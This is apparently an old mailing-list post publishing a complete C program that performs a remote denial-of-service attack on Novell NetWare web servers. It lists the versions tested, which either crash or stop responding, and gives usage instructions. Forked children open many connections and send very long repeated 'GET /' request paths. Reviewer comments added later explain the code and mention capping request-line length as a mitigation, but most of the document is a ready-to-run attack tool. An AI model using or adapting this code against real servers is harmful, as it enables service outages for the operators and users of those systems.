Sorry, if it already has been published:

/******************************************************************************

               Novell NetWare webservers remote denial of service
                              <venglinat_private>

*******************************************************************************

 Tested on:
 - Novell NetWare 4.11 with Novell-HTTP-Server/3.1R1:
     Webserver stops responding requests for few minutes.
 - Novell NetWare 4.1 with Novell-HTTP-Server/2.51R1:
     Whole system crash [page fault?].
 - Novell NetWare ?.? with YAWN/1.05 (crc:E8B0):
     Webserver crash.
 - Novell NetWare 3.12 with YAWN/1.05 (crc:E8B0):
     No problems.
 - Novell NetWare 4.11 with YAWN/1.05 (crc:E8B0):
     No problems.

*******************************************************************************

 Usage: ./www <vulnerable_host> <http_port> <how_many_connections> <string_length>
 Example: ./www copernicus.9lo.lublin.pl 80 10 10000

******************************************************************************/

/*
 * Reviewer summary (what the code below puts on the wire):
 *   - Each request is the text "GET /" followed by one path fragment repeated
 *     many times. No HTTP version and no CR/LF is ever written, and the
 *     socket is closed right after the write.
 *   - Four such requests are sent per child process, one per PATn fragment,
 *     each over its own TCP connection.
 *   - The failure is in how the listed servers handle a very long,
 *     repetitive request path; the results per version are in the header
 *     above.
 * NOTE(review): the post names no fixed version or workaround. A cap on
 * request-line length in front of the server is the generic control; confirm
 * against vendor advisories.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/wait.h>

/* Request method, and the four path fragments that get repeated. */
#define GET "GET"
#define PAT1 "/"
#define PAT2 "a/"
#define PAT3 "../"
#define PAT4 "./"

/*
 * Resolve `name` to an IPv4 address.
 *
 * First tries inet_addr() (dotted-quad text). If that yields -1, falls back
 * to gethostbyname(); a failed lookup prints an error and terminates the
 * process with status 1. The value returned is what inet_addr() produced or
 * the first 4 bytes of the resolver's h_addr.
 */
long getip(char *name)
{
	struct hostent *hp;
	long ip;

	if ((ip=inet_addr(name))==-1)
	{
		if ((hp=gethostbyname(name))==NULL)
		{
			perror("gethostbyname");
			exit(1);
		}
		/* Copies exactly 4 bytes: assumes an IPv4 result; the address
		   family/length reported in *hp is not checked. */
		memcpy(&ip, (hp->h_addr), 4);
	}
	return ip;
}

/*
 * Entry point. Arguments: <host> <port> <connections> <len>.
 *
 * Builds four request strings of roughly `len` bytes, then forks
 * <connections> children; each child sends the four strings over four
 * separate TCP connections and exits.
 * (Old K&R-style parameter declarations are kept as published.)
 */
int main (argc, argv)
int argc;
char **argv;
{
	struct sockaddr_in cli;
	int sockfd, i, x, len;
	char *msg1, *msg2, *msg3, *msg4;

	if (argc < 5)
	{
		(void)fprintf(stderr, "usage: %s <host> <port> <connections> <len>\n", argv[0]);
		exit(0);
	}

	/* Destination address; atoi() gives no error reporting for a bad port. */
	bzero(&cli, sizeof(cli));
	cli.sin_family = AF_INET;
	cli.sin_addr.s_addr=getip(argv[1]);
	cli.sin_port = htons(atoi(argv[2]));

	len = atoi(argv[4]);

	/* sizeof on a string literal counts the terminating NUL, so the floor
	   here is 4 + 1 + 2 = 7. The comparison is made in the unsigned type of
	   sizeof, so on typical platforms a negative len is not rejected. */
	if (len < (sizeof(GET)+1+sizeof(PAT1)))
	{
		(void)fprintf(stderr, "len too small.\n");
		exit(1);
	}

	/* One buffer per pattern, len + 7 bytes each. malloc() results are not
	   checked before use. */
	msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
	msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
	msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
	msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);

	/* Every request starts with the same 5-byte prefix "GET /". */
	sprintf(msg1, "%s %s", GET, PAT1);
	sprintf(msg2, "%s %s", GET, PAT1);
	sprintf(msg3, "%s %s", GET, PAT1);
	sprintf(msg4, "%s %s", GET, PAT1);

	/* Repeat counts divide by sizeof (fragment length + 1), so each request
	   carries fewer than len bytes of repeated fragment and fits its buffer. */
	for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1);
	for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2);
	for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3);
	for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4);

	/* The parent does not wait inside the loop, so the children run
	   concurrently. A failed fork() (-1) is not detected; it is treated the
	   same as the parent branch. */
	for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork()))
	{
		/* Child: four connect/write/close rounds, one per request string.
		   write() return values are ignored and nothing is read back. */
		if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
		{
			perror("socket");
			exit(1);
		}

		if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
		{
			perror("connect");
			exit(1);
		}

		write(sockfd, msg1, strlen(msg1));
		close(sockfd);

		if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
		{
			perror("socket");
			exit(1);
		}

		if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
		{
			perror("connect");
			exit(1);
		}

		write(sockfd, msg2, strlen(msg2));
		close(sockfd);

		if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
		{
			perror("socket");
			exit(1);
		}

		if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
		{
			perror("connect");
			exit(1);
		}

		write(sockfd, msg3, strlen(msg3));
		close(sockfd);

		if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
		{
			perror("socket");
			exit(1);
		}

		if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
		{
			perror("connect");
			exit(1);
		}

		write(sockfd, msg4, strlen(msg4));
		close(sockfd);

		exit(0);
	}

	/* Waits only for the pid left in x by the last fork(); i is reused as the
	   status word. If the connection count was 0, x was never assigned. */
	waitpid(x,&i,0);
	exit(0);
}

--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglinat_private ** PGP:D48684904685DF43EA93AFA13BE170BF *